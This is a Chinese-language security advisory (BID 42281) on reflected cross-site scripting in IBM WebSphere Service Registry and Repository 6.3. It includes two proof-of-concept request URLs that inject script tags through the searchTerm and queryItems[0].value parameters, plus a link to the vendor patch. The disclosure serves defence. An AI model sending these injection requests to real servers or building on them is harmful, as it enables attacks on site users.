发布日期：2010-08-06
更新日期：2010-08-09

受影响系统：

IBM WebSphere Service Registry and Repository 6.3

描述：

---

BUGTRAQ  ID: 42281

WebSphere Service Registry and Repository是用于存储、访问和管理信息（通常是指服务元数据）的系统。

当queryConditionGroupType设置为AND的时候，WebSphere Service Registry and Repository没有正确地过滤提交给ServiceRegistry/HelpSearch.do的searchTerm参数和提交给ServiceRegistry/QueryWizardProcessStep1.do的queryItems[0].value参数便返回给了用户，这可能导致跨站脚本攻击。

<*来源：IBM （ncsupp@ca.ibm.com）
  
  链接：http://secunia.com/advisories/40862/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/ServiceRegistry/HelpSearch.do?searchTerm=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3C
/ServiceRegistry/QueryWizardProcessStep1.do?queryConditionGroupType=AND&queryItems[0].value=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&queryItems[1].value=&queryItems[2].value=&queryItems[3].value=&queryItems[4].value=&wizard.button.setClassification=&wizard.button.next=Next

建议：

---

厂商补丁：

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www-01.ibm.com/support/docview.wss?uid=swg1IZ76926

浏览次数：2373
严重程度：0（网友投票）